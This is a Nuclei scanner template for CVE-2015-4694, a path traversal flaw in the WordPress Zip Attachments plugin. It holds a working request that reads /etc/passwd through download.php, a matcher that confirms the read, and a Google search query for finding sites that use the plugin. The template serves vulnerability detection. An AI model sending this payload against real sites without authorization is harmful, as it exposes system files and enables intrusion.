nuclei-templates/cves/2015/CVE-2015-4694.yaml

39 lines
1.1 KiB
YAML

id: CVE-2015-4694
info:
name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval
author: 0x_Akoko
severity: high
description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.
reference:
- https://wordpress.org/plugins/zip-attachments/#developers
- https://wpscan.com/vulnerability/8047
- https://nvd.nist.gov/vuln/detail/CVE-2015-4694
- http://www.vapid.dhs.org/advisory.php?v=126
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2015-4694
cwe-id: CWE-22
metadata:
google-query: inurl:"/wp-content/plugins/zip-attachments"
tags: lfi,wordpress,cve,cve2015,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/04/12